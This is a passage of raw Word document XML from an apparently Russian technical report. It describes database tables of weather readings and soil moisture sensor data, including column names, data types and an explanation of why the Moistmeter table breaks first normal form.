            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>rh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3C2A0E57" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>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34750163" w14:textId="5010856D" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>влажность воздуха (</w:t>
            </w:r>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> QUOTE </w:instrText>
            </w:r>
            <w:r w:rsidR="00BA1029" w:rsidRPr="0066369B">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79162BCE" wp14:editId="1495C0C2">
                  <wp:extent cx="190500" cy="3048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66369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> </w:instrText>
            </w:r>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BA1029" w:rsidRPr="0066369B">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="629B7E57" wp14:editId="5EF07E12">
                  <wp:extent cx="190500" cy="3048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66369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="4CAA4FA0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="610B69CA" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>t</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0DE66053"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5A09FFE1" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>температура воздуха (градусы цельсия)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="47C07BBC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3CBD94C0" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>winddir</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="50006B9B"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3B2CFBB1" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>направление ветра (градусы цельсия)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="4FE6C285" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3E57AB3F" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>wind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="44516275"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013B02CA" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>скорость ветра (м/с)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="6887F5B2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="62C13890" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>rain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="29A3E639"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0FC3E07E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>количество осадков (мм)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1519C576" w14:textId="77777777" w:rsidR="004A1170" w:rsidRDefault="004A1170" w:rsidP="00112241"/>
    <w:p w14:paraId="42E9A925" w14:textId="675A7A7C" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00112241">
      <w:r>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Moistmeter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00646613">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>содержит данные, собранные влагомерами</w:t>
      </w:r>
      <w:r w:rsidR="008C1A5F">
        <w:t>, в данной таблице нарушена первая нормальная форма баз данных. Такое нарушение обусловлено тем, что заказчик предоставил разработчику базу данных в таком виде, и разработчик не в праве изменять структуру базы данных, ведь при изменении структуры данных базы информация от почвенных датчиков-влагомеров не будут в неё поступать из</w:t>
      </w:r>
      <w:r w:rsidR="000436C1">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="008C1A5F">
        <w:t>за конфликта имён</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Описание данных приведено в таблице </w:t>
      </w:r>
      <w:r w:rsidR="00823137">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190AD778" w14:textId="3F2DD8E8" w:rsidR="0093378B" w:rsidRPr="00EC10A8" w:rsidRDefault="0093378B" w:rsidP="00646613">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00541C36">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r w:rsidR="00823137">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00541C36">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Свойства таблицы «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Moistmeter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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8"/>
        <w:gridCol w:w="1748"/>
        <w:gridCol w:w="4951"/>
      </w:tblGrid>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="251A7C6D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4FF8E711" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Название колонки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1765" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1AC5542A" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Тип данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5021" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1F3A92B2" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Описание</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="1366B820" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="04241933" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1765" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="77E76475" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>int4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5021" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0305DFC8" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>уникальный идентификатор записи</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="46B5E82B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="66B26D81" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>measure</w:t>
            </w:r>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1765" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="661FE273" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5021" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="703F47E4" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>дата измерения (ГГГГ-ММ-ДД)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="523C605F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4B989AA7" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>measure</w:t>
            </w:r>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>hour</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1765" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3871DB20"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02F02808" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>час измерения (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>чч</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="284A6502" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2559" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7149EF75" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>channel1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1765" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
